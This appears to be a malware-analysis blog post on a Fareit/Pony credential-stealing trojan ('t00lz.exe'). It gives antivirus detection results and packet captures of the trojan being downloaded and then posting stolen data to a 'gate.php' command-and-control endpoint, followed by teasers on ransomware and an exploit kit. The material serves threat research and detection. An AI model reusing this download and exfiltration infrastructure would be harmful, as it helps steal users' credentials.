| SHA256: | 09002c686e358799a9d732f4483a31a858bb140a3dfd59df54b1d449d2f8122b |
| File name: | t00lz.exe |
| Detection ratio: | 50 / 55 |
| Analysis date: | 2016-11-02 02:52:48 UTC ( 2 minutes ago ) |
| Ad-Aware | Gen:Variant.Razy.11684 | 20161102
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| AegisLab | Troj.W32.Gen.lIb0 | 20161102 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| AhnLab-V3 | Trojan/Win32.Tepfer.N2144687522 | 20161101 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Antiy-AVL | Trojan[:HEUR]/Win32.Unknown | 20161102 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Arcabit | Trojan.Razy.D2DA4 | 20161102 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Avast | Win32:Evo-gen [Susp] | 20161102 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Avira (no cloud) | TR/PSW.Fareit.iloen | 20161101 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Baidu | Win32.Trojan-PSW.Fareit.a | 20161101 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| BitDefender | Gen:Variant.Razy.11684 | 20161102 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| CAT-QuickHeal | PWS.Fareit.E3 | 20161101 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ClamAV | Win.Trojan.Fareit-403 | 20161101 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Comodo | TrojWare.Win32.PWS.Fareit.GS | 20161102 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| CrowdStrike Falcon (ML) | malicious_confidence_98% (W) | 20161024 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Cyren | W32/Tepfer.R.gen!Eldorado | 20161102 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| DrWeb | Trojan.PWS.Stealer.1932 | 20161102 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ESET-NOD32 | a variant of Win32/PSW.Fareit.A | 20161101 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Emsisoft | Gen:Variant.Razy.11684 (B) | 20161102 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| F-Prot | W32/Tepfer.R.gen!Eldorado | 20161102 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| F-Secure | Gen:Variant.Razy.11684 | 20161102 |
2016-11-01 21:22:37.170895 IP 192.168.1.102.51077 > 216.34.181.96.80: Flags [P.], seq 0:298, ack 1, win 64240, length 298: HTTP: GET /pony/t00lz.exe HTTP/1.1
E..R.w@……..f.”.`…P,.J8….P…]i..GET /pony/t00lz.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: t00lz.sourceforge.net
Connection: Keep-Alive
2016-11-01 21:22:37.225484 IP 192.168.1.102.51077 > 216.34.181.96.80: Flags [.], ack 2921, win 64240, length 0
E..(.x@……..f.”.`…P,.Kb….P….Y……..
—
E..(..@……..f.”.`…PX3|F..lpP…M}……..
2016-11-01 21:22:45.130245 IP 192.168.1.102.51078 > 216.34.181.96.80: Flags [P.], seq 0:274, ack 1, win 64240, length 274: HTTP: POST /pony/gate.php HTTP/1.0
E..:..@……..f.”.`…PX3|F..lpP…@s..POST /pony/gate.php HTTP/1.0
Host: t00lz.sourceforge.net
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 338
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Written By
You must be logged in to post a comment.
What Kryptik virus can do? Executable code extractionAttempts to connect to a dead IP:Port (1 unique times)Creates RWX memoryA process attempted to delay the analysis task.Expresses interest in specific running processesHTTP traffic contains suspicious features which may be indicative of malware related trafficPerforms some HTTP requestsThe binary likely contains encrypted or compressed da...
Avast FileRepMetagen [Malware] AVG FileRepMetagen [Malware] Avira (no cloud) Malwarebytes Ransom.Jigsaw McAfee-GW-Edition BehavesLike.Win32.Ransomware.dc Microsoft Trojan:Win32/Occamy.C When executed this ransomware has NO C2 it...
2020-04-13 00:28:49.420813 IP 192.168.86.25.52831 > 93.126.60.109.80: Flags [P.], seq 1:391, ack 1, win 16500, length 390: HTTP: GET /2.exe HTTP/1.1E…]R@….J..V.]~<m._.P+…80..P.@t….GET /2.exe HTTP/1.1Accept: image/jpeg, application/x-ms-application, im...
Fallout Exploit Kit is back and targeting the following CVE's as of 4-8-2020: Vulnerabilities CVE-2018-4878CVE-2018-15982CVE-2018-8174 Fallout has been observed in the wild delivering the following malware payloads: Ransomware Stop - RansomwareGandCr...
[…] Original article: Razy/Fareit Variant Pony Trojan Downloader Malware FULL PCAP File Download Traffic Sample gate.php. […]